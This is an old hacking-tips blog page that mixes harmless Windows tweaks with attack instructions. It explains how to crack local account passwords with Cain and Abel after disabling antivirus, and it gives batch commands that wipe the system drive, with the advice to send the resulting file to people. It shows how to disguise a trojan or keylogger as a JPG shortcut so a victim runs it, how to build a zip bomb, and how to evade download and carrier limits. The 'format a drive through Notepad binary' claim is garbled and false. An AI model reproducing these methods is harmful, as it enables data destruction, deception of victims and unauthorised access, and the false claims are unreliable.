9) Finally, Restart your computer.

10) You now have a faster computer and 1-2GB of Virtual RAM..!


Pop A Banner Each Time Windows Boots

To pop a banner which can contain any message you want to display just before a user is going to log on.

Go to the key :- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
Now create a new string Value in the right pane named 'LegalNoticeCaption' and enter the value that you want to see in the MenuBar.


Now create yet another new string value and name it:
'LegalNoticeText'.
Modify it and insert the message you want to display each time Windows boots.

This can be effectively used to display the company's private policy each time the user logs on to his NT box.

It's '.reg' file would be:
REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="Caption here."

Improve Windows-XP Shutdown Speed

This tweak reduces the time Windows-XP waits before automatically closing any running programs when you give it the command to shutdown..

Follow the steps as given below-

1) Go to Start then select Run

2) Type 'Regedit' and click ok

3) Find 'HKEY_CURRENT_USER\Control Panel\Desktop\'

4) Select 'WaitToKillAppTimeout'

5) Right click and select 'Modify'

6) Change the value to '1000'

7) Click 'OK'

8) Now select 'HungAppTimeout'

9) Right click and select 'Modify'

10) Change the value to '1000'

11) Click 'OK'

Google Hacking

Basic Operators:-
1) And (+) :- This operator is used to include multiple terms in a query which is to be searched in google.
example:- if we type "hacker+yahoo+science" in google search box and click search, it will reveal the results something which are related to all the three words simultaneously i.e. hacker, yahoo and science.

2 ) OR (|) :- The OR operator, represented by symbol( | ) or simply the word OR in uppercase letters, instructs google to locate either one term or another term in a query.

3) NOT :-
It is opposite of AND operator, a NOT operator excludes a word from search.
example:- If we want to search websites containing the terms google and hacking but not security then we enter the query like "google+hacking" NOT "security".


Advanced Operators:-
1) Intitle :- This operator searches within the title tags.
examples:- intitle:hacking returns all pages that have the string "hacking" in their title.
intitle:"index of" returns all pages that have string "index of" in their title.
Companion operator:- "allintitle".

2) Inurl :- Returns all matches, where url of the pages contains given word.
example:- inurl:admin returns all matches, where url of searched pages must contains the word "admin".
Companion operator:- "allinurl".

3) Site :- This operator narrows search to specific website. It will search results only from given domain. Can be used to carry out information gathering on specific domain.
example:- site:www.microsoft.com will find results only from the domain www.microsoft.com

4) Link :- This operator allows you to search for pages that links to given website.
example:- link:www.microsoft.com
Here, each of the searched result contains asp links to www.microsoft.com

5) Info :- This operator shows summary information for a site and provides links to other google searches that might pertain to that site.
example:- info:www.yahoo.com

6) Define :- This operator shows definition for any term.
example:- define:security
It gives various definitions for the word "security" in different manner from all over the world.

7) Filetype :- This operator allows us to search specific files on the internet. The supported file types can be pdf, xls, ppt, doc, txt, asp, swf, rtf, etc..
example:- If you want to search for all text documents presented on domain www.microsoft.com then we enter the query something like following.
"inurl:www.microsoft.com filetype:txt"

Thursday, March 5, 2009


Windows-XP Password Cracking

Here we use the tool "Cain and Abel" for cracking passwords of any local user/administrator.
First download cain and abel from "http://www.oxid.it/cain.html" and install it on your system.

Make sure that you have disabled the antivirus/firewall running on your system before installing and throughout this process....

Two most effective techniques used here are "Brute-Force" and "Cryptanalysis".

Brute-Force:- As this techniques takes more time to complete, the attacker prefer this technique only when there is a hope that the password contain same type of characters or may be two. i.e only loweralpha, only alpha, only numeric or may be loweralpha-numeric, also it should contain less than 7 characters. Otherwise it takes more time to crack password, which may be the mixture of all types of characters along with special symbols.
The step-by-step explaination for this technique is given below-

1) Open the tool "Cain and Abel"


2) Go into the category "Cracker" it displays all sub-categories under "Cracker" in left panel.


3) Select "LM & NTLM Hashes" from left panel and then click on symbol, you will be greeted by a window as shown.


4) Check "import hashes from local system" and then click "Next". This shows all the active accounts on local system like administrator, guest, etc. along with LM and NT hashed values of their respective passwords, as shown below.


5) Right clicking on any username shows all available options using which we can crack it's password.


6) Here we select "Brute-Force Attack" and then "NTLM Hashes", since windows uses NTLM hashes to store local users' passwords.

7) You will be greeted by a window where you can modify properties for brute-force attack such as password length, character set, etc.


8) Click on "Start" button.

9) On completion it will reveal the exact password.





Folder Lock Without Any Software

Folder Lock With Password Without Any Software-
Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.


if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


Calculations On Command Prompt

The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:

C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7

Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.

For more information, type set /? at the command prompt.


Running Multiple Instances of Yahoo Messenger

If you are using Yahoo! Messenger v8.0 or above, YahooMulti.reg will let you run multiple copies of Yahoo Messenger.
At the same time which will allow you to login multiple ID’s at the same time.

1) Open Registry Editor (regedit.exe)
Click Start > Run and then type 'regedit' press enter.

2) Then Look For-
HKEY_CURRENT_ USER\Software\yahoo\ pager\Test.

3) Then change this value of plural to like this-
“Plural”=dword: 00000001

Reveal *****(Asterisk) Passwords Using Javascript

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox.

Increase Broadband Speed Using Simple Tweak

A Simple Tweak (XP Pro only) which will increase your Broadband Speed.

Make sure you Log on as Administrator, not as a user with Administrator privileges.

Follow the steps as given below-

1) Click on Start Button.

2) Select Run From Start Menu.

3) Type gpedit.msc

4) Expand the [Administrative Templates] branch.

5) Then Expand the [Network] branch.

6) Highlight(Select by Single Click) [QoS Packet Scheduler]

7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)

8) Check(Select By Single Click on it) [Enabled]

9) Change [Bandwidth limit %] to 0 %

10) Click [OK] Button.

11) Restart Your PC.

12) Now Check Your Broadband Speed.

Have a good life.celebrate

Format A HDD With Notepad

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.

Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-
Save As An EXE Any Name Will Do

Step 3 :-
Send the EXE to People And Infect

OR

IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its working

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file


Shutdown Command Via Command Prompt

The 'Shutdown' Command Becomes More Flexible and Automated when used from the Command Prompt.

To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.
In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.
You have to use at least one switch for the shutdown command to work.

The Switches :-
The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.

-i: Display GUI interface, must be the first option
-l: Log off (cannot be used with -m option)
-s: Shutdown the computer
-r: Shutdown and restart the computer
-a: Abort a system shutdown
-m \\computername: Remote computer to shutdown/restart/abort
-t xx: Set timeout for shutdown to xx seconds
-c “comment”: Shutdown comment (maximum of 127 characters)
-f: Forces running applications to close without warning
-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)

Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.
If you are having trouble try using a '/' in place of '-' in your switches.

Examples :-
shutdown –m \\computername –r –f
This command will restart the computer named computername and force any programs that might still be running to stop.

shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120
This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.

shutdown –m \\computername –a
This command will abort a previous shutdown command that is in progress.

Using A Batch File :-
You can create a file that performs the shutdown command on many computers at one time.

In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.

Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.
Make sure each shutdown command is on its own line.
An example of what should be typed in notepad is given below-

shutdown –m \\computer1 –s
shutdown –m \\computer2 –s
shutdown –m \\computer3 -s

Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.
Pick the location to save the batch file in and save it.

When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.

You can use any combination of shutdown commands in a batch file.

Hide EXE File into JPG

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Create An Ftp Server On Your PC

Process-1:
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside..

1) Goto no-ip & create urself a free account.

2) Now ur account been created & ll receive ur account password via mail to ur email address.

3) After getting ur password login to ur account of no-ip.com
4.After getting logged in, click upon add a HOST its on the left menu.

5) Type any hostname u want (eg:-abc) & select any domain from da given list (eg:-ftpserve.com) Click on Submit.

6) Now u have owned ur own static address (example: abc.serveftp.com)

7) Now click downloads button which is present above on the page & click on which operating system ur using & den download DNS update client or u can download it from here directly, this is for microsoft window users..

8) After getting downloaded, u have to install this software & login here with ur email addresss & p/w wen asked for it.

9) At last tick on da check box present at the static address.

10) U have ur own static web address.


Process-2:
Installation & setting of the FTP-Server

1) You have to install Serv-U 4.1.03 , download this software from here

2) Run Serv-U & use da wizard to setup ur FTP.

3) Click on next until u have been asked for IP-Address, leave it as it is & click upon next.

4) Enter ur domain name u have registered (example: abc.serveftp.com) it above in da domain field & click upon next.

5) U ll be asked for anonymous access, select No & click upon next.

6) Next u ll be asked for creating a named account, select yes & click upon next.

7) Choose any user name u wish (eg:-xyz) & clcik upon next.

8) Enter password for dis account (eg:-adc341) for security purpose choose difficult password.

9) U ll be asked for da home directory for the account which u have created above.Select directory & click upon next.

10) Click on yes for locking dis account to da home directory, doing dis da user cannot further move up into home directory, click upon next.

11) At last ur account has been created click finish.


Process-3:
Configuring the user accounts which u have been created.

1) On the left tree-menu, select da account which u have been created above & den click upon General Tab.

2) Goto Hide 'Hidden' Files.

3) Check Allow only and enter the number one in the box.

4) Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don't leave it blank as uers can download with full bandwidth.

5) choose how many users u want to login at on time.It depends on ur connection speed try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)

6) Click upon Dir Access Tab.

7) Now u can c home folder here.Highlight it & make ur permission.

8) If u want only users to download check only these Read,List & Inherit.

9) If u want ur users to upload into ur server & bu tto only 1 particular folder but not to downlaod, click upon dat add button & then select dat folder, Now u have to highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create & Inherit after setting these permissions click on the arrow which is present at the bottom right-hand corner.U want dis upload folder 2 be list first, before da home folder.

10) If der is any folder which u dont want anyone to access it, & it is present in the home folder, den click da add button & den select da folder.Now u have to highlight dat folder & see dat no all da checkboxes are left.After doing this click upon upper arrow which is present at bottom right hand corner.

11) There are many things u can do, These are only the basics....

12) Your server is now ready to be connected..

13) Login with your username & password...


Create Folders and Files With NO! Name

This trick will allow you to create files and folders without any name.

Just follow the steps as given below :-

1) Select any file or folder.

2) Right click on it, select 'Rename' or simply press 'F2'.

3) Press and hold the 'Alt' key. While holding the Alt key, type numbers '0160' from the numpad.

Note :- Type the numbers '0160' from the numpad, that is, the numbers present on the right side of the keyboard.
Don’t type the numbers which are present on top of the character keys.

4) Press Enter and the nameless file or folder will be created.

Reason :- The file or folder that seems nameless is actually named with a single space.



But what if you want to create another nameless file or folder in the same directory ?
For this you will have to rename the file with 2 spaces.
Just follow the steps given below :-

1) Select file, Press 'F2'.

2) Hold 'Alt' key and type '0160' from the numpad.

3) Release the 'Alt' key. Now without doing anything else, again hold 'Alt' key and type '0160'.

4) Press 'Enter' and you will have second nameless file in the same directory.

5) Repeat step 3 to create as many nameless files or folders in the same directory.

(We have a problem with deleting these folders, to do so, start your computer in 'Safe Mode' and delete it from there.)

The ZIP of Death

This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.

1) Make a.txt file

2) Open and type the null character (alt + 255)

3) Press ctrl + a then ctrl + v a couple times to make some null bytes

4) If u have a hexeditor make the hex 00 for about 50 kilobytes.

5) Now make several copies of a.txt and name accordinly

6) Open cmd.exe

7) Type copy /b *.txt b.txt

8) Now every copy is made into a super copy and repeat

9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!

The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555

Just add some more and the file will expand amazingly

Make sure to not open this after

You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

Run Firefox inside Firefox

How to run Firefox inside Firefox.?

Yup you can run Firefox inside firefox just by typing following url.

How about Opening Firefox inside Firefox which is again in another Firefox..?
Not bad huh?
And its really easy too just type in this url in Firefox's address bar and there you go!
Firefox inside Firefox!

copy paste following url in a web browser (mozilla firefox).

chrome://browser/content/browser.xul


Following is the screenshot of this trick (firefox in firefox in firefox, which is again in another firefox)-


firefox inside firefox

Chat With Your Friends Through MS DOS Command Prompt

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:

7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

8) Now all you need to do is type your message and press Enter.
Start Chatting.......!

Access Free Airtel GPRS Using TeaShark Browser

Access Free Airtel GPRS Using TeaShark Browser

TeaShark, a mobile browser like Opera Mini, allow you to access Airtel GPRS for FREE.
Shockingly it has nothing to do with modifying any Airtel settings or any kind of hack.

Here is how I used this…

* Download TeaShark v. 312. Its free and being JAR file it can be installed on most handsets.
* Open it from your mobile and select AirTel Live as access point.
* That’s it! Open any site from TeaShark and you won’t be charged anything.

Note for the first time, when TeaShark starts, it may take more than one minute to initialize. Also this one time initialization may fail many times. But don’t loose your heart!

As of now, this trick is limited to handsets only.

Note:“Subscribe to Packet Data First”
This means you need to activate AirTel Live service which is free.
Contact customer care to get it activated.
Also select only AirTel Live as access point when prompted by TeaShark.

Visit Downloadpage of TeaShark.



Rapidshare Hacks - Unlimited Downloads, No Waiting...!

There are two hacks to beat Rapidshare download limits and waiting time.

1) Rapidshare Hack (For Firefox Users) :-
The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.
The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment.
But most of the time, that advantage is available only to people with the programming skills to make the changes they want.

That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.

Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools.
It changes how Web pages look and act by altering the rendering process.

http://greasemonkey.mozdev.org/

1) Install the Greasemonkey extension>>
http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi
2) Restart Firefox
3) Go to http://rapidshare.de/files/1034529/rapidshare.user.js.html
4) Right click on rapidshare.user.js and choose "Install User Script".
5) Run FireFox.
6) From 'File' Menu click on Open File then browse to whereever you saved the 'greasemonkey.xpi' plug-in.
Open it, wait a couple seconds for the install button becomes active.
7) Click on it to install this plug-in then CLOSE FIREFOX.
8) Run FireFox again.
From the File Menu click on Open File then browse to whereever you saved the 'rapidshare.user.js'.
9) Open it.
10) Click the Tools Menu then click on Install User Script then click OK.
11) Close FireFox.

The script will let you enjoy "no wait" and multiple file downloads......!


2) Rapidshare Hack (NIC Tricks and MAC Cloning) :-
Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day.
To get around this, you need to show the rapidshare server a different IP address.
Here are some methods for doing this-

A] Short-Out the JavaScript:
1) Goto the page you want to download
2) Select FREE button
3) In the address bar put this- javascript:alert(c=0)
4) Click OK
5) Click OK to the pop-up box
6) Enter the captcha
7) Download Your File

B] Request a new IP address from your ISP server:
Here’s how to do it in windows:
1) Click Start
2) Click run
3) In the run box type cmd.exe and click OK
4) When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5) Erase your cookies in whatever browser you are using.
6) Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens.
Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work.
If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

C] Use a proxy with SwitchProxy and Firefox:
1) Download and install Firefox
2) Download and install SwitchProxy
3) Google for free proxies
4) When you hit your download limit, clean your cookies and change your proxy

D] You can use a bookmarklet to stop your wait times:
1) Open IE
2) Right Click On This Link
3) Select Add to Favorites
4) Select Yes to the warning that the bookmark may be unsafe.
5) Name it “RapidShare No Wait”
6) Click on the Links folder (if you want to display it in your IE toolbar)
7) Click OK
8) You may need to close and reopen IE to see it
9) Goto rapidshare and click the bookmarklet when you are forced to wait
 

Advertise

Friends list

  • CA's easy-to-use security suite lacks sufficient protection to stop many of today's threats. Don't rely on it.A cursory look at CA Internet Security 2008 m...

Term of Use:

Disclaimer : The Contents Of this Site is Only for Knowledge Purpose, Do not use this in a wrong way.

Hacker's Alley Copyright © 2009 This template is Designed by Ipietoon. Sponsored by Hacker's Alley